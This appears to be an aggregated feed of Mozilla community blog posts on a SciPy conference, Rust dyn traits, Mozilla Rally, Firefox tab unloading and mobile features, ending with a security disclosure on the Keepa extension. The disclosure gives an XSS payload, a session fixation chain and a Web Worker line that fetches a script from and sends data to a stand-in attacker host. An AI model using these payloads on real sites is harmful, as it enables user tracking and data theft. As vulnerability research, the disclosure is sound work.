Data@Mozilla: My first time experience at the SciPy conference

In July 2021, a few fellow Mozillians and I attended the SciPy conference, with Mozilla as a diversity sponsor, meaning that our sponsorship went towards paying the stipend for the diversity speaker, Tess Tannenbaum. This was my first time attending a SciPy conference and also my first time supporting data science recruiting efforts at a conference.  The conference showcased the latest open source Python projects for the advancement of scientific computing.  I was eager to meet the contributors of many commonly used data science Python packages and hear about new features in upcoming releases. I was excited about this opportunity, as I strongly believe that conference attendance is an extremely rewarding experience for networking and learning about industry trends.  As a Data Scientist, my day-to-day work often involves using Python libraries such as scikit-learn, numpy and pandas to derive insights from data.  For a technical and data science geek like me, it felt particularly close to heart to learn about code developments and use cases from other enthusiasts in the industry.

One talk that I particularly enjoyed was on the topic of Time-to-Event Modeling in Python, led by Brian Kent and a few other data science experts.  Time-to-Event Modeling is also referred to as survival analysis, which was traditionally used in biological research studies to predict lifespans. The speakers at the talk were contributors to some of the most popular survival analysis Python packages.  For example, Lifelines is an introductory Python package that makes a good starting point for survival analysis.  Scikit-Survival is another package, built on top of the commonly used machine learning package scikit-learn.  The focus of the talk was on how survival analysis can be useful in many different scenarios, such as customer analytics.  There is also increasing usage of survival analysis in SaaS businesses, where it can be used to predict customer churn and help companies plan their retention strategies.  I am curious how Mozilla can potentially apply survival analysis in ways that also respect our data governance guidelines.

Like many other large group events of the past year, the conference was entirely virtual and utilized various platforms to host talks and engagement activities.  In addition to having Slack as a communication tool, the conference also used Airmeet and Gather town this year.  The various sessions, tutorials and recruiting booths were hosted in Airmeet.  The more interactive talks took place in Gather town, which I found quite entertaining and enjoyable.  It is a game-like environment where everyone has a character that can walk around in the virtual space.  You can network or meet with others by walking up to their characters; their video feeds appear as you approach.  Conference organizers did a great job quickly adapting to hosting virtual gatherings and coordinating multiple tools to deliver a seamless experience.

When the SciPy conference happens next year in 2022, I will dedicate more time to networking and attending more tutorials, ideally in person.  I am also hopeful that it can be an opportunity to meet some of my remote colleagues from Mozilla face to face.  Overall, the conference experience was definitely rewarding, as it is important to stay current with new developments and collaborate with other technical enthusiasts in the rapidly changing scientific computing industry.


Resources:

Mozillians sharing the 2021 SciPy Conference experience:

SciPy 2021 conference proceedings

SciPy 2021 YouTube Channel

Niko Matsakis: Dyn async traits, part 3

In the previous “dyn async traits” posts, I talked about how we can think about the compiler as synthesizing an impl that performed the dynamic dispatch. In this post, I wanted to start exploring a theoretical future in which this impl is written manually by the Rust programmer. This is in part a thought exercise, but it’s also a possible ingredient for a future design: if we could give programmers more control over the “impl Trait for dyn Trait” impl, then we could enable a lot of use cases.

Example

For this post, async fn is kind of a distraction. Let’s just work with a simplified Iterator trait:

trait Iterator {
    type Item;
    fn next(&mut self) -> Option<Self::Item>;
}

As we discussed in the previous post, the compiler today generates an impl that is something like this:

impl<I> Iterator for dyn Iterator<Item = I> {
    type Item = I;
    fn next(&mut self) -> Option<I> {
        type RuntimeType = ();
        let data_pointer: *mut RuntimeType = self as *mut ();
        let vtable: DynMetadata = ptr::metadata(self);
        let fn_pointer: fn(*mut RuntimeType) -> Option<I> =
            __get_next_fn_pointer__(vtable);
        fn_pointer(data_pointer)
    }
}

This code draws on the APIs from RFC 2580, along with a healthy dash of “pseudo-code”. Let’s see what it does:

Extracting the data pointer

type RuntimeType = ();
let data_pointer: *mut RuntimeType = self as *mut ();

Here, self is a wide pointer of type &mut dyn Iterator<Item = I>. The rules for as state that casting a wide pointer to a thin pointer drops the metadata¹, so we can (ab)use that to get the data pointer. Here I just gave the pointer the type *mut RuntimeType, which is an alias for *mut () — i.e., raw pointer to something. The type alias RuntimeType is meant to signify “whatever type of data we have at runtime”. Using () for this is a hack; the “proper” way to model it would be with an existential type. But since Rust doesn’t have those, and I’m not keen to add them if we don’t have to, we’ll just use this type alias for now.
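
Spelled out as two well-typed steps, the same cast looks like this (a sketch using the names from the impl above):

// First coerce the reference into a raw wide pointer, then use `as`
// to drop the metadata and keep only the thin data pointer.
let wide: *mut dyn Iterator<Item = I> = self;
let data_pointer: *mut RuntimeType = wide as *mut ();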

Extracting the vtable (or DynMetadata)

let vtable: DynMetadata = ptr::metadata(self);

The ptr::metadata function was added in RFC 2580. Its purpose is to extract the “metadata” from a wide pointer. The type of this metadata depends on the type of wide pointer you have: this is determined by the Pointee trait. For dyn types, the metadata is a DynMetadata, which just means “pointer to the vtable”. In today’s APIs, the DynMetadata is pretty limited: it lets you extract the size/alignment of the underlying RuntimeType, but it doesn’t give any access to the actual function pointers that are inside.
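
To make that concrete, here is a minimal sketch of what these APIs let you do today; this assumes nightly Rust with the unstable ptr_metadata feature enabled:

#![feature(ptr_metadata)] // RFC 2580 APIs are still unstable

use std::fmt::Debug;
use std::ptr::{self, DynMetadata};

fn main() {
    let value: u32 = 22;
    let object: &dyn Debug = &value;

    // Extract the vtable pointer from the wide pointer.
    let meta: DynMetadata<dyn Debug> = ptr::metadata(object);

    // Today's API exposes the layout of the erased type...
    assert_eq!(meta.size_of(), 4);
    assert_eq!(meta.align_of(), 4);
    // ...but not the function pointers stored in the vtable.
}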

Extracting the function pointer from the vtable

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

Now we get to the pseudocode. Somehow, we need a way to get the fn pointer out from the vtable. At runtime, the way this works is that each method has an assigned offset within the vtable, and you basically do an array lookup; kind of like vtable.methods()[0], where methods() returns an array &[fn()] of function pointers. The problem is that there’s a lot of “dynamic typing” going on here: the signature of each one of those methods is going to be different. Moreover, we’d like some freedom to change how vtables are laid out. For example, the ongoing (and awesome!) work on dyn upcasting by Charles Lew has required modifying our vtable layout, and I expect further modification as we try to support dyn types with multiple traits, like dyn Debug + Display.
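
As a purely illustrative toy model (this is not Rust’s actual vtable layout, which is unspecified and still evolving), the runtime lookup amounts to something like this:

// A made-up vtable layout; the real one is unspecified and evolving.
struct ToyVtable {
    size: usize,
    align: usize,
    // One type-erased entry per method; assume `next` is at index 0.
    methods: [*const (); 1],
}

fn get_next_fn_pointer<I>(vtable: &ToyVtable) -> fn(*mut ()) -> Option<I> {
    // An array lookup followed by a cast to the method's true signature.
    // If the index or the signature is wrong, nothing catches the
    // mistake: this is the "dynamic typing" hazard described above.
    unsafe { std::mem::transmute(vtable.methods[0]) }
}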

So, for now, let’s just leave this as pseudocode. Once we’ve finished walking through the example, I’ll return to this question of how we might model __get_next_fn_pointer__ in a forwards compatible way.

One thing worth pointing out: the type of fn_pointer is a fn(*mut RuntimeType) -> Option<I>. There are two interesting things going on here:

  • The argument has type *mut RuntimeType: using the type alias indicates that this function is known to take a single pointer (in fact, it’s a reference, but those have the same layout). This pointer is expected to point to the same runtime data that self points at — we don’t know what it is, but we know that they’re the same. This works because self paired together a pointer to some data of type RuntimeType along with a vtable of functions that expect RuntimeType references.²
  • The return type is Option<I>, where I is the item type: this is interesting because although we don’t know statically what the Self type is, we do know the Item type. In fact, we will generate a distinct copy of this impl for every kind of item. This allows us to easily pass the return value.

Calling the function

fn_pointer(data_pointer)

The final line in the code is very simple: we call the function! It returns an Option<I> and we can return that to our caller.

Returning to the pseudocode

We relied on one piece of pseudocode in that imaginary impl:

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

So how could we possibly turn __get_next_fn_pointer__ from pseudocode into real code? There are two things worth noting:

  • First, the name of this function already encodes the method we want (next). We probably don’t want to generate an infinite family of these “getter” functions.
  • Second, the signature of the function is specific to the method we want, since it returns a fn type (fn(*mut RuntimeType) -> Option<I>) that encodes the signature for next (with the self type changed, of course). This seems better than just returning a generic signature like fn() that must be cast manually by the user; less opportunity for error.

Using zero-sized fn types as the basis for an API

One way to solve these problems would be to build on the trait system. Imagine there were a type for every method, let’s call it A, and that this type implemented a trait like AssociatedFn:

trait AssociatedFn {
    // The type of the associated function, but as a `fn` pointer
    // with the self type erased. This is the type that would be
    // encoded in the vtable.
    type FnPointer;

     // maybe other things
}

We could then define a generic “get function pointer” function like so:

fn associated_fn<A>(vtable: DynMetadata) -> A::FnPointer
where
    A: AssociatedFn

Now instead of __get_next_fn_pointer__, we can write

type NextMethodType =  /* type corresponding to the next method */;
let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
   associated_fn::<NextMethodType>(vtable);

Ah, but what is this NextMethodType? How do we get the type for the next method? Presumably we’d have to introduce some syntax, like Iterator::next.
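
As a hedged sketch of what that might look like, suppose the compiler synthesized a zero-sized type for Iterator::next; both the type name and the impl below are invented here for illustration:

// Hypothetical compiler-generated type representing `Iterator::next`
// for some item type `I`, independent of any particular `Self`.
struct IteratorNext<I>(std::marker::PhantomData<I>);

impl<I> AssociatedFn for IteratorNext<I> {
    // `next`, with the self type erased to a thin pointer.
    type FnPointer = fn(*mut ()) -> Option<I>;
}

// The pseudocode then becomes:
//     let fn_pointer = associated_fn::<IteratorNext<I>>(vtable);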

This idea of a type for associated functions is very close (but not identical) to an already existing concept in Rust: zero-sized function types. As you may know, the type of a Rust function is in fact a special zero-sized type that uniquely identifies the function. There is (presently, anyway) no syntax for this type, but you can observe it by printing out the size of values (playground):

fn foo() { }

// The type of `f` is not `fn()`. It is a special, zero-sized type that uniquely
// identifies `foo`.
let f = foo;
println!("{}", std::mem::size_of_val(&f)); // prints 0

// This type can be coerced to `fn()`, which is a function pointer
let g: fn() = f;
println!("{}", std::mem::size_of_val(&g)); // prints 8 (on a 64-bit target)

There are also types for functions that appear in impls. For example, you could get an instance of the type that represents the next method on vec::IntoIter<u32> like so:

let x = <vec::IntoIter<u32> as Iterator>::next;
println!("{}", std::mem::size_of_val(&x)); // prints 0

Where the zero-sized types don’t fit

The existing zero-sized types can’t be used for our “associated function” type for two reasons:

  • You can’t name them! We can fix this by adding syntax.
  • There is no zero-sized type for a trait function independent of an impl.

The latter point is subtle³. Before, when I talked about getting the type for a function from an impl, you’ll note that I gave a fully qualified function name, which specified the Self type precisely:

let x = <vec::IntoIter<u32> as Iterator>::next;
//       ^^^^^^^^^^^^^^^^^^ the Self type

But what we want in our impl is to write code that doesn’t know what the Self type is! So this type that exists in the Rust type system today isn’t quite what we need. But it’s very close.
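
Concretely, the asymmetry looks like this (a sketch; the error comment paraphrases the compiler):

// Works: the `Self` type is fully specified, so this names the unique
// zero-sized type for that impl's `next`.
let x = <std::vec::IntoIter<u32> as Iterator>::next;

// Does not compile: there is no type for "`Iterator::next` in general,
// independent of an impl", which is exactly what the dyn impl needs.
// let y = Iterator::next; // ERROR: cannot infer type for `Self`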

Conclusion

I’m going to leave it here. Obviously, I haven’t presented any kind of final design, but we’ve seen a lot of tantalizing ingredients:

  • Today, the compiler generates an impl Iterator for dyn Iterator that extracts functions from the vtable and invokes them by magic.
  • But, using the APIs from RFC 2580, you can almost write that impl by hand. What is missing is a way to extract a function pointer from the vtable, and what makes that hard is that we need a way to identify the function we are extracting.
  • We have zero-sized types that represent functions today, but we don’t have a way to name them, and we don’t have zero-sized types for functions in traits, only in impls.

Of course, all of the stuff I wrote here was just about normal functions. We still need to circle back to async functions, which add a few extra wrinkles. Until next time!

Footnotes

  1. I don’t actually like these rules, which have bitten me a few times. I think we should introduce an accessor function, but I didn’t see one in RFC 2580 — maybe I missed it, or it already exists. 

  2. If you used unsafe code to pair up a random pointer with an unrelated vtable, then hilarity would ensue here, as there is no runtime checking that these types line up. 

  3. And, in fact, I didn’t see it until I was writing this blog post! 

Hacks.Mozilla.Org: Control your data for good with Rally

Let’s face it: if you have ever used the internet, signed up for an online account, or even read a blog post like this one, chances are that your data has left a permanent mark on the interwebs. Online services have exploited your data without your awareness for a very long time.

The Fight for Privacy

The fight for privacy is compounded by the rise in misinformation, with platforms like Facebook willingly sharing information that is untrustworthy, shutting down tools like Crowdtangle and recently terminating the accounts of the New York University researchers who built Ad Observer, an extension dedicated to bringing greater transparency to political advertising. We think a better internet is one where people have more control over their data.

Contribute your data for good

In a world where data and AI are reshaping society, people currently have no tangible way to put their data to work for the causes they believe in. To address this, we built the Rally platform, a first-of-its-kind tool that enables you to contribute your data to specific studies and exercise consent at a granular level. Mozilla Rally puts you in control of your data while building a better Internet and a better society. 

Mozilla Rally

Like Mozilla, Rally is a community-driven open source project, and we publish our code on GitHub so that it is freely available for you to audit. Privacy, control and transparency are foundational to Rally. Participating is voluntary, meaning we won’t collect data unless you agree to it first, and we’ll provide you with a clear understanding of what we have access to at every step of the way.


With your help, we can create a safer, more transparent, and more equitable internet that protects people, not Big Tech. 

Interested?

Rally needs users and is currently available for Firefox. In the future, we will expand to other web browsers. We’re currently looking for users who are residents of the United States, age 19 and older.

Protecting the internet and its users is hard work!  We’re also hiring to grow our Rally Team.


The post Control your data for good with Rally appeared first on Mozilla Hacks - the Web developer blog.

Support.Mozilla.Org: Introducing Abby Parise

Hi folks,

It’s with great pleasure that I introduce Abby Parise, who is the latest addition to the Customer Experience team. Abby is taking the role of Support Content Manager, so you’ll definitely see more of her in SUMO. If you were with us or have watched September’s community call, you might’ve seen her there.

Here’s a brief introduction from Abby:

Hi there! My name is Abby and I’m the new Support Content Manager for Mozilla. I’m a longtime Firefox user with a passion for writing compelling content to help users achieve their goals. I’m looking forward to getting to know our contributors and would love to hear from you on ideas to make our content more helpful and user-friendly!

Please join me to welcome Abby!

Hacks.Mozilla.Org: Tab Unloading in Firefox 93

Starting with Firefox 93, Firefox will monitor available system memory and, should it ever become so critically low that a crash is imminent, Firefox will respond by unloading memory-heavy but not actively used tabs. This feature is currently enabled on Windows and will be deployed later for macOS and Linux as well. When a tab is unloaded, the tab remains in the tab bar and will be automatically reloaded when it is next selected. The tab’s scroll position and form data are restored just like when the browser is restarted with the restore previous windows browser option.

On Windows, out-of-memory (OOM) situations are responsible for a significant number of the browser and content process crashes reported by our users. Unloading tabs allows Firefox to save memory leading to fewer crashes and avoids the associated interruption in using the browser.

We believe this may especially benefit people who are doing heavy browsing work with many tabs on resource-constrained machines, or those simply trying to play a memory-intensive game or use a website that goes a little crazy. And of course, there are the tab hoarders (no judgement here). Firefox is now better at surviving these situations.

We have experimented with tab unloading on Windows in the past, but a problem we could not get past was finding the balance between decreasing the browser’s memory usage and annoying the user with the slight delay as a tab gets reloaded. It is a rather difficult exercise, and we never got satisfactory results.

We have now approached the problem again by refining our low-memory detection and tab selection algorithm and narrowing the action to the case where we are sure we’re providing a user benefit: if the browser is about to crash. Recently we have been conducting an experiment on our Nightly channel to monitor how tab unloading affects browser use and the number of crashes our users encounter. We’ve seen encouraging results with that experiment. We’ll continue to monitor the results as the feature ships in Firefox 93.

With our experiment on the Nightly channel, we hoped to see a decrease in the number of OOM crashes hit by our users. However, after the month-long experiment, we found an overall significant decrease in browser crashes and content process crashes. Of those remaining crashes, we saw an increase in OOM crashes. Most encouragingly, people who had tab unloading enabled were able to use the browser for longer periods of time. We also found that average memory usage of the browser increased.

The latter may seem very counter-intuitive, but is easily explained by survivorship bias. Much like in the archetypal example of the Allied WWII bombers with bullet holes, browser sessions that had such high memory usage would have crashed and burned in the past, but are now able to survive by unloading tabs just before hitting the critical threshold.

The increase in OOM crashes, also very counter-intuitive, is harder to explain. Before tab unloading was introduced, Firefox already responded to Windows memory-pressure by triggering an internal memory-pressure event, allowing subsystems to reduce their memory use. With tab unloading, this event is fired after all possible unloadable tabs have been unloaded.

This may account for the difference. Another hypothesis is that it’s possible our tab unloading sometimes kicks in a fraction too late and finds the tabs in a state where they can’t even be safely unloaded any more.

For example, unloading a tab requires a garbage collection pass over its JavaScript heap. This needs some additional temporary storage that is no longer available, leading to the tab crashing instead of being unloaded, but still saving the entire browser from going down.

We’re working on improving our understanding of this problem and the relevant heuristics. But given the clearly improved outcomes for users, we felt there was no point in holding back the feature.

When does Firefox automatically unload tabs?

When system memory is critically low, Firefox will begin automatically unloading tabs. Unloading tabs could disturb users’ browsing sessions, so the approach aims to unload tabs only when necessary to avoid crashes. On Windows, Firefox gets a notification from the operating system (set up using CreateMemoryResourceNotification) indicating that the available physical memory is running low. The threshold for low physical memory is not documented, but appears to be around 6%. Once that occurs, Firefox starts periodically checking the commit space (MEMORYSTATUSEX.ullAvailPageFile).

When the commit space reaches a low-memory threshold, which is defined with the preference “browser.low_commit_space_threshold_mb”, Firefox will unload one tab, or if there are no unloadable tabs, trigger the Firefox-internal memory-pressure warning allowing subsystems in the browser to reduce their memory use. The browser then waits for a short period of time before checking commit space again and then repeating this process until available commit space is above the threshold.
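
For a rough picture of that flow, here is a minimal sketch in Rust using the winapi crate’s bindings for the Win32 calls named above (the threshold and polling interval are placeholder values, not Firefox’s; the exact module paths are an assumption about the winapi crate):

use std::{mem, thread, time::Duration};
use winapi::um::memoryapi::{
    CreateMemoryResourceNotification, LowMemoryResourceNotification,
    QueryMemoryResourceNotification,
};
use winapi::um::sysinfoapi::{GlobalMemoryStatusEx, MEMORYSTATUSEX};

fn watch_memory() {
    unsafe {
        // Ask Windows for a "physical memory is low" notification object.
        let low_mem = CreateMemoryResourceNotification(LowMemoryResourceNotification);
        loop {
            let mut is_low = 0;
            QueryMemoryResourceNotification(low_mem, &mut is_low);
            if is_low != 0 {
                // Physical memory is low: start checking commit space.
                let mut status: MEMORYSTATUSEX = mem::zeroed();
                status.dwLength = mem::size_of::<MEMORYSTATUSEX>() as u32;
                GlobalMemoryStatusEx(&mut status);
                // Placeholder threshold; Firefox reads its own from the
                // browser.low_commit_space_threshold_mb preference.
                if status.ullAvailPageFile < 200 * 1024 * 1024 {
                    // Unload one tab, or fire the internal
                    // memory-pressure event, then re-check.
                }
            }
            thread::sleep(Duration::from_secs(1));
        }
    }
}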

We found the checks on commit space to be essential for predicting when a real out-of-memory situation is happening. As long as there is still swap AND physical memory available, there is no problem. If we run out of physical memory and there is swap, performance will crater due to paging, but we won’t crash.

On Windows, allocations fail and applications will crash if there is low commit space in the system even though there is physical memory available because Windows does not overcommit memory and can refuse to allocate virtual memory to the process in this case. In other words, unlike Linux, Windows always requires commit space to allocate memory.

How do we end up in this situation? If some applications allocate memory but do not touch it, Windows does not assign the physical memory to such untouched memory. We have observed graphics drivers doing this, leading to low swap space when plenty of physical memory is available.

In addition, crash data we collected indicated that a surprising number of users with beefy machines were in this situation, some perhaps thinking that because they had a lot of memory in their machine, the Windows swap could be reduced to the bare minimum. You can see why this is not a good idea!

How does Firefox choose which tabs to unload first?

Ideally, only tabs that are no longer needed will be unloaded and the user will eventually restart the browser or close unloaded tabs before ever reloading them. A natural metric is to consider when the user has last used a tab. Firefox unloads tabs in least-recently-used order.

Tabs playing sound, using picture-in-picture, pinned tabs, or tabs using WebRTC (which is used for video and audio conferencing sites) are weighted more heavily so they are less likely to be unloaded. Tabs in the foreground are never unloaded. We plan to do more experiments and continue to tune the algorithm, aiming to reduce crashes while maintaining performance and being unobtrusive to the user.

about:unloads

For diagnostic and testing purposes, a new page about:unloads has been added to display the tabs in their unload-priority-order and to manually trigger tab unloading. This feature is currently in beta and will ship with Firefox 94.

Screenshot of the about:unloads page in beta planned for Firefox 94.

Browser Extensions

Some browser extensions already offer users the ability to unload tabs. We expect these extensions to interoperate with automatic tab unloading as they use the same underlying tabs.discard() API. Although it may change in the future, today automatic tab unloading only occurs when system memory is critically low, which is a low-level system metric that is not exposed by the WebExtensions API. (Note: an extension could use the native messaging support in the WebExtensions API to accomplish this with a separate application.) Users will still be able to benefit from tab unloading extensions and those extensions may offer more control over when tabs are unloaded, or deploy more aggressive heuristics to save more memory.

Let us know how it works for you by leaving feedback on ideas.mozilla.org or reporting a bug. For support, visit support.mozilla.org. Firefox crash reporting and telemetry adhere to our data privacy principles. See the Mozilla Privacy Policy for more information.

Thanks to Gian-Carlo Pascutto, Toshihito Kikuchi, Gabriele Svelto, Neil Deakin, Kris Wright, and Chris Peterson, for their contributions to this blog post and their work on developing tab unloading in Firefox.

The post Tab Unloading in Firefox 93 appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla Blog: News from Firefox Focus and Firefox on Mobile

One of our promises this year was to deliver ways to help you navigate the web easily and get you quickly where you need to go. We took a giant step in that direction earlier this year when we shared a new Firefox experience. We were on a mission to save you time and streamline your everyday use of the browser. This month, we continue to deliver on that mission with new features in our Firefox on mobile products. For our Firefox Focus mobile users, we have a fresh redesign plus new features, including shortcuts that get you to the things you want faster. And this Cybersecurity Awareness month, you can manage your passwords and take them wherever you go with the Firefox on Android mobile app.

Fresh, new Firefox Focus 

Since its launch, Firefox Focus has been a favorite app for its minimal design and streamlined features, and for those times when you want to do a super quick search without the distractions. So, when it came to refreshing Firefox Focus, we wanted to offer a simple, privacy-by-default companion app that allows users to quickly complete searches without distraction or worry of being tracked or bombarded with advertisements. We added a fresh new look with new colors, a new logo and a dark theme. We added a shortcut feature so that users can get to the sites they visit the most. And with privacy in mind, the Tracking Protection Shield icon is accessible from the search bar, so you can quickly turn individual trackers on or off when you click it. Plus, we added a global counter that shows you all the trackers blocked for you. Check out the new Firefox Focus and try it for life’s “get in and get out” moments.

New shortcut feature to get you to the sites you visit most

Got a ton of passwords? Keep them safe on Firefox on Android

What do Superman, Black Widow and Wolverine have in common? They make horrible passwords. At least that’s what we discovered when we took a look to see how fortified superhero passwords are in the fight against hackers and breaches. You can see how your favorite superheroes fared in “Superhero passwords may be your kryptonite wherever you go online.”  

This Cybersecurity Awareness month, we added new features to Firefox on Android to keep your passwords safe. We’ve become increasingly dependent on the web, whether it’s signing up for streaming services or finding new ways to connect with family and friends, and we’ve all had to open new accounts and assign completely new passwords. Whether it’s 10 or 100 passwords, you can take your passwords wherever you go with Firefox on Android. These new features, which will be available on iOS later this year, include:

  • Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and use on both mobile and desktop.

Create and add new passwords

  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
Sync all your passwords across desktop and mobile devices

  • Unlock your passwords with your fingerprint or face – Now only you can open your saved accounts, using your operating system’s biometric security, such as your face or your fingerprint, to unlock the page that holds your logins and passwords.

Firefox coming soon to a Windows store near you

Microsoft has loosened restrictions on its Windows Store that effectively banned third-party browsers from the store. We have been advocating for years for more user choice and control on the Windows operating system. We welcome the news that their store is now more open to companies and applications, including independent browsers like Firefox. We believe that a healthier internet is one where people have an opportunity to choose from a diverse range of browsers and browser engines. Firefox will be available in the Windows store later this year. 

Get the fast, private browser for your desktop and mobile: Firefox on Android, Firefox for iOS and Firefox Focus today.

For more on Firefox:

11 secret tips for Firefox that will make you an internet pro

7 things to know (and love) about the new Firefox for Android

Modern, clean new Firefox clears the way to all you need online

Behind the design: A fresh new Firefox

The post News from Firefox Focus and Firefox on Mobile appeared first on The Mozilla Blog.

Wladimir Palant: Abusing Keepa Price Tracker to track users on Amazon pages

As we’ve seen before, shopping assistants usually aren’t a good choice of browser add-on if you value either your privacy or security. This impression is further reinforced by Keepa, the Amazon Price Tracker. The good news here: the scope of this extension is limited to Amazon properties. But that’s all the good news there is. I’ve already written about excessive data collection practices in this extension. I also reported two security vulnerabilities to the vendor.

Today we’ll look at a persistent Cross-Site Scripting (XSS) vulnerability in the Keepa Box. This one allowed any attacker to track you across Amazon web properties. The second vulnerability exposed Keepa’s scraping functionality to third parties and could result in data leaks.

(Image: a meat grinder with the Keepa logo on its side working on the Amazon logo, producing lots of prices and stars. Image credits: Keepa, palomaironique, Nikon1803)

Persistent XSS vulnerability

What is the Keepa Box?

When you open an Amazon product page, the Keepa extension will automatically inject a frame like https://keepa.com/iframe_addon.html#3-0-B07FCMBLV6 into it. Initially, it shows you a price history for the article, but there is far more functionality here.

(Screenshot: a complicated graph showing the price history of an Amazon article, with several knobs to tweak the presentation as well as several other options, such as logging in.)

This page, called the Keepa Box, is mostly independent of the extension. Whether the extension is present or not, it lets you look at the data, log into an account and set alerts. The extension merely assists it by handling some messages, more on that below.

Injecting HTML code

The JavaScript code powering the Keepa Box is based on jQuery, security-wise a very questionable choice of framework. As common with jQuery-based projects, this one will compose HTML code from strings. And it doesn’t bother properly escaping special characters, so there are plenty of potential HTML injection points. For example this one:

html = storage.username ?
          "<span id=\"keepaBoxSettings\">" + storage.username + "</span>" :
          "<span id=\"keepaBoxLogin\">" + la._9 + "</span>";

If the user is logged in, the user name as set in storage.username will be displayed. So a malicious user name like me<img src=x onerror=alert(1)> will inject additional JavaScript code into the page (here displaying a message). While it doesn’t seem possible to change the user name retroactively, it was possible to register an account with a user name like this one.

Now this page is using the Content Security Policy mechanism which could have prevented the attack. But let’s have a look at the script-src directive:

script-src 'self' 'unsafe-inline' https://*.keepa.com https://apis.google.com
    https://*.stripe.com https://*.googleapis.com https://www.google.com/recaptcha/
    https://www.gstatic.com/recaptcha/ https://completion.amazon.com
    https://completion.amazon.co.uk https://completion.amazon.de
    https://completion.amazon.fr https://completion.amazon.co.jp
    https://completion.amazon.ca https://completion.amazon.cn
    https://completion.amazon.it https://completion.amazon.es
    https://completion.amazon.in https://completion.amazon.nl
    https://completion.amazon.com.mx https://completion.amazon.com.au
    https://completion.amazon.com.br;

That’s lots of different websites, some of which might allow circumventing the protection. But the 'unsafe-inline' keyword makes complicated approaches unnecessary, inline scripts are allowed. Already the simple attack above works.

Deploying session fixation

You probably noticed that the attack described above relies on you choosing a malicious user name and logging into that account. So far this is merely so-called Self-XSS: the only person you can attack is yourself. Usually this isn’t considered an exploitable vulnerability.

This changes however if you can automatically log other people into your account. Then you can create a malicious account in advance, after which you make sure your target is logged into it. Typically, this is done via a session fixation attack.

On the Keepa website, the session is determined by a 64 byte alphanumeric token. In the JavaScript code, this token is exposed as storage.token. And the login procedure involves redirecting the user to an address like https://keepa.com/#!r/4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih which will store 4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih as the current session token.

So the complete attack would look like this:

  • Register an account with a malicious user name like me<img src=x onerror=alert(1)>
  • Check the value of storage.token to extract the session token
  • If a Keepa user visits your website, make sure to open https://keepa.com/#!r/<token> in a pop-up window (can be closed immediately afterwards)

Your JavaScript code (here alert(1)) will be injected into each and every Keepa Box of this user now. As the Keepa session is persistent, it will survive browser restarts. And it will even run on the main Keepa website if the user logs out, giving you a chance to prevent them from breaking out of the session fixation.

Keepa addressed this vulnerability by forbidding angled brackets in user names. The application still contains plenty of potentially exploitable HTML injection points, Content Security Policy hasn’t been changed either. The session fixation attack is also still possible.

The impact

The most obvious consequence of this vulnerability: the malicious code can track all Amazon products that the user looks at. And then it can send messages that the Keepa extension will react to. These are mostly unspectacular except for two:

  • ping: retrieves the full address of the Amazon page, providing additional information beyond the mere article ID
  • openPage: opens a Private Browsing / Incognito window with a given page address (seems to be unused by Keepa Box code but can be abused by malicious code nevertheless)

So the main danger here is that some third party will be able to spy on the users whenever they go to Amazon. But for that it needs to inject considerable amounts of code, and it needs to be able to send data back. With user names being at most 100 characters long, and with Keepa using a fairly restrictive Content Security Policy: is it even possible?

Usually, the approach would be to download additional JavaScript code from the attacker’s web server. However, Keepa’s Content Security Policy mentioned above only allows external scripts from a few domains. Any additional scripts still have to be inserted as inline scripts.

Most other Content Security Policy directives are similarly restrictive and don’t allow connections to arbitrary web servers. The only notable exception is worker-src:

worker-src 'self' blob: data: *;

No restrictions here for some reason, so the malicious user name could be something like:

<img
  src=x
  onerror="new Worker('//malicious.example.com').onmessage=e=>document.write(e.data)">

This will create a Web Worker with the script downloaded from malicious.example.com. Same-origin policy won’t prevent it from running if the right CORS headers are set. And then it will wait for HTML code to be sent by the worker script. The HTML code will be added to the document via document.write() and can execute further JavaScript code, this time without any length limits.

The same loophole in the Content Security Policy can be used to send exfiltrated data to an external server: new Worker("//malicious.example.com?" + encodeURIComponent(data)) will be able to send data out.

Data exposure vulnerability

My previous article on Keepa already looked into Keepa’s scraping functionality, in particular how Keepa loads Amazon pages in background to extract data from them. When a page loads, Keepa tells its content script which scraping filters to use. This isn’t done via inherently secure extension communication APIs but rather via window.postMessage(). The handling in the content script essentially looks as follows:

window.addEventListener("message", function (event) {
  if (event.source == window.parent && event.data) {
    var instructions = event.data.value;
    if ("data" == event.data.key && instructions.url == document.location) {
      scrape(instructions, function (scrapeResult) {
        window.parent.postMessage({ sandbox: scrapeResult }, "*");
      });
    }
  }
}, false);

This will accept scraping instructions from the parent frame, regardless of whether the parent frame belongs to the extension or not. The content script will perform the scraping, potentially extracting security tokens or private information, and send the results back to its parent frame.

A malicious website could abuse this by loading a third-party page in a frame, then triggering the scraping functionality to extract arbitrary data from it, something that same-origin policy normally prevents. The catch: the content script is only active on Amazon properties and Keepa’s own website. And luckily most Amazon pages with sensitive data don’t allow framing by third parties.

Keepa’s website on the other hand is lacking such security precautions. So my proof-of-concept page would extract data from the Keepa forum if you were logged into it: your user name, email address, number of messages and whether you are a privileged user. Extracting private messages or any private data available to admins would have been easy as well. All that without any user interaction and without any user-visible effects.

This vulnerability has been addressed in Keepa 3.88 by checking the message origin. Only messages originating from an extension page are accepted now, messages from websites will be ignored.

Conclusions

Keepa’s reliance on jQuery makes it susceptible to XSS vulnerabilities, with the one described above being only one out of many potential vulnerabilities. While the website itself probably isn’t a worthwhile target, persistent XSS vulnerabilities in the Keepa Box expose users to tracking by arbitrary websites. This tracking is limited to shopping on Amazon websites but will expose a great deal of potentially private information for the typical Keepa user.

Unlike most websites, Keepa deployed a Content Security Policy that isn’t useless. By closing the remaining loopholes, attacks like the one presented here could be made impossible or at least considerably more difficult. To date, the vulnerability has been addressed minimally however and the holes in the Content Security Policy remain.

